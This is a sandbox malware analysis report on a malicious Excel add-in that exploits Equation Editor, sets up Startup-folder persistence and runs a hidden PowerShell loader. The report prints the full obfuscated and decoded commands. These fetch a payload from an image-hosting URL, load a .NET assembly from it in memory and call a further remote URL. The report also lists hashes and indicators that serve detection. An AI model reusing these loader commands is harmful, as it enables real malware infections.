Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
15/08/2023, 12:42
Static task
static1
Behavioral task
behavioral1
Sample
NUEVO PEDIDO - CF0002.xlam
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
NUEVO PEDIDO - CF0002.xlam
Resource
win10v2004-20230703-en
General
-
Target
NUEVO PEDIDO - CF0002.xlam
-
Size
624KB
-
MD5
5689ad77747f797c7fce700583f816a4
-
SHA1
0c50fdc9f2e15c8a08c55d4eb4677282e544de4d
-
SHA256
dc7443935ed909e177df4ee104aa44d63ae47cf482b2d03fe0cff0bc3a1fbfc7
-
SHA512
6a139d6f80025b4a1518a7178e47366c0176e1e6a73017cb044380ab51a06aaab80e7d2f69d25d673abf463cdf2abe03dc4e1beb6c59926fe4a3afc90da33cd2
-
SSDEEP
12288:ITIKpW2H8A00G0lx3dgcxaCnF/FrIVN7CbT3AR3fkO15GrnxV60fus/y2:EIKpW2H8A/b3aK5IRfDdCl/y2
Malware Config
Extracted
https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855
https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 3 2872 EQNEDT32.EXE 7 2260 powershell.exe 9 2260 powershell.exe 11 2260 powershell.exe 12 2260 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ qO.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ qO.vbs powershell.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2872 EQNEDT32.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2724 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1276 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2456 powershell.exe 1052 powershell.exe 2260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2456 powershell.exe Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 2260 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1276 EXCEL.EXE 1276 EXCEL.EXE 1276 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2872 wrote to memory of 2280 2872 EQNEDT32.EXE 29 PID 2872 wrote to memory of 2280 2872 EQNEDT32.EXE 29 PID 2872 wrote to memory of 2280 2872 EQNEDT32.EXE 29 PID 2872 wrote to memory of 2280 2872 EQNEDT32.EXE 29 PID 2280 wrote to memory of 2740 2280 WScript.exe 31 PID 2280 wrote to memory of 2740 2280 WScript.exe 31 PID 2280 wrote to memory of 2740 2280 WScript.exe 31 PID 2280 wrote to memory of 2740 2280 WScript.exe 31 PID 2740 wrote to memory of 2724 2740 cmd.exe 33 PID 2740 wrote to memory of 2724 2740 cmd.exe 33 PID 2740 wrote to memory of 2724 2740 cmd.exe 33 PID 2740 wrote to memory of 2724 2740 cmd.exe 33 PID 2740 wrote to memory of 2432 2740 cmd.exe 34 PID 2740 wrote to memory of 2432 2740 cmd.exe 34 PID 2740 wrote to memory of 2432 2740 cmd.exe 34 PID 2740 wrote to memory of 2432 2740 cmd.exe 34 PID 2432 wrote to memory of 2456 2432 cmd.exe 35 PID 2432 wrote to memory of 2456 2432 cmd.exe 35 PID 2432 wrote to memory of 2456 2432 cmd.exe 35 PID 2432 wrote to memory of 2456 2432 cmd.exe 35 PID 2280 wrote to memory of 1052 2280 WScript.exe 36 PID 2280 wrote to memory of 1052 2280 WScript.exe 36 PID 2280 wrote to memory of 1052 2280 WScript.exe 36 PID 2280 wrote to memory of 1052 2280 WScript.exe 36 PID 1052 wrote to memory of 2260 1052 powershell.exe 38 PID 1052 wrote to memory of 2260 1052 powershell.exe 38 PID 1052 wrote to memory of 2260 1052 powershell.exe 38 PID 1052 wrote to memory of 2260 1052 powershell.exe 38
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\NUEVO PEDIDO - CF0002.xlam"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1276
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\xauixgpo.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\xauixgpo.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ qO.vbs')"3⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 54⤵
- Runs ping.exe
PID:2724
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\xauixgpo.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ qO.vbs')"4⤵
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\xauixgpo.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ qO.vbs')5⤵
- Drops startup file
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DY#@$#Mw#@$#v#@$#DY#@$#Mg#@$#x#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#dQBu#@$#Gk#@$#dgBl#@$#HI#@$#cwBv#@$#F8#@$#dgBi#@$#HM#@$#LgBq#@$#H#@$##@$#ZQBn#@$#D8#@$#MQ#@$#2#@$#Dk#@$#M#@$##@$#5#@$#DM#@$#MQ#@$#4#@$#DU#@$#NQ#@$#n#@$#Ds#@$#J#@$#B3#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#g#@$#D0#@$#I#@$#BO#@$#GU#@$#dw#@$#t#@$#E8#@$#YgBq#@$#GU#@$#YwB0#@$#C#@$##@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBO#@$#GU#@$#d#@$##@$#u#@$#Fc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#QgB5#@$#HQ#@$#ZQBz#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#LgBE#@$#G8#@$#dwBu#@$#Gw#@$#bwBh#@$#GQ#@$#R#@$#Bh#@$#HQ#@$#YQ#@$#o#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FU#@$#cgBs#@$#Ck#@$#Ow#@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBU#@$#GU#@$#e#@$#B0#@$#C4#@$#RQBu#@$#GM#@$#bwBk#@$#Gk#@$#bgBn#@$#F0#@$#Og#@$#6#@$#FU#@$#V#@$#BG#@$#Dg#@$#LgBH#@$#GU#@$#d#@$#BT#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#g#@$#D0#@$#I#@$##@$#n#@$#Dw#@$#P#@$#BC#@$#EE#@$#UwBF#@$#DY#@$#N#@$#Bf#@$#FM#@$#V#@$#BB#@$#FI#@$#V#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#RgBs#@$#GE#@$#Zw#@$#g#@$#D0#@$#I#@$##@$#n#@$#Dw#@$#P#@$#BC#@$#EE#@$#UwBF#@$#DY#@$#N#@$#Bf#@$#EU#@$#TgBE#@$#D4#@$#Pg#@$#n#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#p#@$#Ds#@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#Ek#@$#bgBk#@$#GU#@$#e#@$#BP#@$#GY#@$#K#@$##@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#ZwBl#@$#C#@$##@$#M#@$##@$#g#@$#C0#@$#YQBu#@$#GQ#@$#I#@$##@$#k#@$#GU#@$#bgBk#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#ZwB0#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#Kw#@$#9#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#u#@$#Ew#@$#ZQBu#@$#Gc#@$#d#@$#Bo#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#GU#@$#bgBk#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#I#@$##@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#Ow#@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#EM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#FM#@$#dQBi#@$#HM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Cw#@$#I#@$##@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#Ew#@$#ZQBu#@$#Gc#@$#d#@$#Bo#@$#Ck#@$#Ow#@$#k#@$#GM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#QgB5#@$#HQ#@$#ZQBz#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBD#@$#G8#@$#bgB2#@$#GU#@$#cgB0#@$#F0#@$#Og#@$#6#@$#EY#@$#cgBv#@$#G0#@$#QgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#EM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#KQ#@$#7#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBS#@$#GU#@$#ZgBs#@$#GU#@$#YwB0#@$#Gk#@$#bwBu#@$#C4#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#F0#@$#Og#@$#6#@$#Ew#@$#bwBh#@$#GQ#@$#K#@$##@$#k#@$#GM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#QgB5#@$#HQ#@$#ZQBz#@$#Ck#@$#Ow#@$#k#@$#HQ#@$#eQBw#@$#GU#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bs#@$#G8#@$#YQBk#@$#GU#@$#Z#@$#BB#@$#HM#@$#cwBl#@$#G0#@$#YgBs#@$#Hk#@$#LgBH#@$#GU#@$#d#@$#BU#@$#Hk#@$#c#@$#Bl#@$#Cg#@$#JwBG#@$#Gk#@$#YgBl#@$#HI#@$#LgBI#@$#G8#@$#bQBl#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C4#@$#RwBl#@$#HQ#@$#TQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#K#@$##@$#n#@$#FY#@$#QQBJ#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#YQBy#@$#Gc#@$#dQBt#@$#GU#@$#bgB0#@$#HM#@$#I#@$##@$#9#@$#C#@$##@$#L#@$##@$#o#@$#Cc#@$#d#@$#B4#@$#HQ#@$#LgBw#@$#Gk#@$#ZgB6#@$#HY#@$#YgBu#@$#C8#@$#O#@$##@$#0#@$#DI#@$#Lg#@$#x#@$#DU#@$#Lg#@$#2#@$#Dc#@$#Lg#@$#w#@$#Dg#@$#Lw#@$#v#@$#Do#@$#c#@$#B0#@$#HQ#@$#a#@$##@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C4#@$#SQBu#@$#HY#@$#bwBr#@$#GU#@$#K#@$##@$#k#@$#G4#@$#dQBs#@$#Gw#@$#L#@$##@$#g#@$#CQ#@$#YQBy#@$#Gc#@$#dQBt#@$#GU#@$#bgB0#@$#HM#@$#KQ#@$#=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.pifzvbn/842.15.67.08//:ptth');$method.Invoke($null, $arguments)"4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5644a53658a2cf4c7d09ef1b40a0e18c5
SHA1f09659fd97960ee065a07865b8f4672442bf36f0
SHA2563e8410a9db787cf3c3ac9a5be89c59d616d79e200a64ac40a65eba62d1e29a36
SHA512627c19d1cb33623e4298363ac9208058cb7cd329392cf094a63021fb137e76fa52e783c528b5cc82062bdbbf1574697b17961479289f20e612e015561ecedaa5
-
Filesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
Filesize
164KB
MD54ff65ad929cd9a367680e0e5b1c08166
SHA1c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0122F2NOX119Z51U13F8.temp
Filesize7KB
MD5b0f7b0d02aa783330feab29dc079d989
SHA1192daf35177e2ce7f8e8e8bc456ef3c9cbde006b
SHA25631d7dee5276bca2a726bfadf43d748e8962096094cfd6f6085c005469b797935
SHA512b07f0de370f2722185c022a85f87b9b66fa92a16b1665b2175425928347d7d215cc4c941aa9a2ec7188600b1af4c8697a00deb78717b525a69a3f71dbb60a747
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b0f7b0d02aa783330feab29dc079d989
SHA1192daf35177e2ce7f8e8e8bc456ef3c9cbde006b
SHA25631d7dee5276bca2a726bfadf43d748e8962096094cfd6f6085c005469b797935
SHA512b07f0de370f2722185c022a85f87b9b66fa92a16b1665b2175425928347d7d215cc4c941aa9a2ec7188600b1af4c8697a00deb78717b525a69a3f71dbb60a747
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b0f7b0d02aa783330feab29dc079d989
SHA1192daf35177e2ce7f8e8e8bc456ef3c9cbde006b
SHA25631d7dee5276bca2a726bfadf43d748e8962096094cfd6f6085c005469b797935
SHA512b07f0de370f2722185c022a85f87b9b66fa92a16b1665b2175425928347d7d215cc4c941aa9a2ec7188600b1af4c8697a00deb78717b525a69a3f71dbb60a747
-
Filesize
175KB
MD5a04e4560531355ddc70126e4b7d6eed7
SHA1345034f52ae0b13ea902fdb7df3e69f005175bcc
SHA25619606bd36344ea38ee7b2883ffc2eb5a8adf25639d9335efc7ba05c7b8e2cde5
SHA51214e16b2a28c559b94188fd5006027a3d840ce82e3e13bca22135a1c6fa91ddf714e4ecdd67281d90bdebf863bf20fb63569afefe3c5bf52c78dc63365f05d650
-
Filesize
175KB
MD5a04e4560531355ddc70126e4b7d6eed7
SHA1345034f52ae0b13ea902fdb7df3e69f005175bcc
SHA25619606bd36344ea38ee7b2883ffc2eb5a8adf25639d9335efc7ba05c7b8e2cde5
SHA51214e16b2a28c559b94188fd5006027a3d840ce82e3e13bca22135a1c6fa91ddf714e4ecdd67281d90bdebf863bf20fb63569afefe3c5bf52c78dc63365f05d650